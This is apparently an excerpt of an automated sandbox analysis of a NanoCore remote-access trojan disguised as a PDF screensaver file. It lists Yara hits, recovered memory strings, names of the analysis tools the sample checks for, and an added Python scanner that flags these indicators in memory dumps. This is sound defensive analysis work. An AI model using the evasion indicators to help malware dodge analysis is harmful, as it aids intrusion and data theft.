Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF654 cpuid 0_2_003EF654
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_003EDF1E
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BFE5F8 GetUserNameW, 6_2_00BFE5F8
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DB146 GetVersionExW, 0_2_003DB146
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information

Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Source: ihgsvw.exe Binary or memory string: WIN_81
Source: ihgsvw.exe Binary or memory string: WIN_XP
Source: ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: ihgsvw.exe Binary or memory string: WIN_XPe
Source: ihgsvw.exe Binary or memory string: WIN_VISTA
Source: ihgsvw.exe Binary or memory string: WIN_7
Source: ihgsvw.exe Binary or memory string: WIN_8
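The entries in this section rest on two kinds of string evidence: the analysis-tool process names (procexp.exe, regshot.exe) that the AutoIt stub ihgsvw.exe carries for its sandbox checks, and the .NET type and assembly names (NanoCore.ClientPluginHost, NanoProtectClient.dll, ClientPlugin.dll, the "[NanoProtect]" log line) behind the Yara matches above and the Remote Access Functionality entries that follow. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it scans a memory region for those markers in both ASCII and UTF-16LE, renders findings in the report's own "String found in binary or memory" form, and gives a family verdict only when the plugin-host interface name co-occurs with a plugin assembly or log-line marker. The dump bytes are constructed for the example, and the co-occurrence condition is this example's assumption, not the condition of the Yara rule the sandbox actually used (that rule is not shown on the page).

```python
import re
from dataclasses import dataclass

# Indicators taken from this report. The AutoIt stub (ihgsvw.exe) keeps the
# names of analysis tools it looks for among running processes; the NanoCore
# client and its plugins expose these .NET type/assembly names in memory.
ANTI_ANALYSIS_TOOLS = ("procexp.exe", "regshot.exe")
NANOCORE_MARKERS = (
    "NanoCore.ClientPluginHost",
    "NanoProtectClient.dll",
    "ClientPlugin.dll",
    "[NanoProtect]: Checking for NanoProtect module..",
)


@dataclass(frozen=True)
class Hit:
    category: str   # "anti-analysis" or "nanocore"
    marker: str
    encoding: str   # "ascii" or "utf-16le"
    offset: int


def _patterns(marker: str):
    """Compile the marker for both encodings such a binary may use: narrow
    strings in the AutoIt stub, UTF-16LE for .NET user strings."""
    yield "ascii", re.compile(re.escape(marker.encode("ascii")))
    yield "utf-16le", re.compile(re.escape(marker.encode("utf-16-le")))


def scan_dump(data: bytes) -> list[Hit]:
    """Return every marker occurrence in the region, ordered by offset."""
    hits = []
    for category, markers in (("anti-analysis", ANTI_ANALYSIS_TOOLS),
                              ("nanocore", NANOCORE_MARKERS)):
        for marker in markers:
            for encoding, pattern in _patterns(marker):
                for match in pattern.finditer(data):
                    hits.append(Hit(category, marker, encoding, match.start()))
    return sorted(hits, key=lambda h: h.offset)


def classify(hits: list[Hit]) -> dict:
    """Family verdict (assumed condition for this example, not the sandbox's
    rule): the plugin-host interface name must co-occur with at least one
    plugin assembly or log-line marker. A lone marker is only suspicious."""
    nano = {h.marker for h in hits if h.category == "nanocore"}
    has_host = "NanoCore.ClientPluginHost" in nano
    has_plugin = bool(nano - {"NanoCore.ClientPluginHost"})
    verdict = has_host and has_plugin
    return {
        "nanocore": verdict,
        "nanocore_suspicious": bool(nano) and not verdict,
        "anti_analysis_tools": sorted(
            {h.marker for h in hits if h.category == "anti-analysis"}),
    }


def format_report(source: str, hits: list[Hit]) -> list[str]:
    """Render hits in the report's own 'Source: ... String found' form."""
    return [f"Source: {source}, 0x{h.offset:x} ({h.encoding}) "
            f"String found in binary or memory: {h.marker}" for h in hits]


# Constructed region (not a real dump): a stub area with ASCII tool names,
# then .NET metadata-style text, then one UTF-16LE user string.
CONSTRUCTED_DUMP = (
    b"\x00" * 64
    + b"procexp.exe\x00regshot.exe\x00"
    + b"\x90" * 32
    + b"<Module>mscorlibNanoCore.ClientPluginHostIClientLoggingHost"
    + b"NanoProtectClient.dll"
    + "[NanoProtect]: Checking for NanoProtect module..".encode("utf-16-le")
    + b"\x00" * 16
)

if __name__ == "__main__":
    found = scan_dump(CONSTRUCTED_DUMP)
    for line in format_report("constructed.sdmp", found):
        print(line)
    print(classify(found))
```

To use it on a real region, read the bytes of a process dump (for instance one of the .sdmp files the report names) and pass them to scan_dump. Searching both encodings matters here: the AutoIt stub stores the tool names as narrow strings, while a .NET assembly's user strings are UTF-16LE, so an ASCII-only search would miss the "[NanoProtect]" log line that the report itself recovered.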

Remote Access Functionality

Source: ihgsvw.exe, 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropS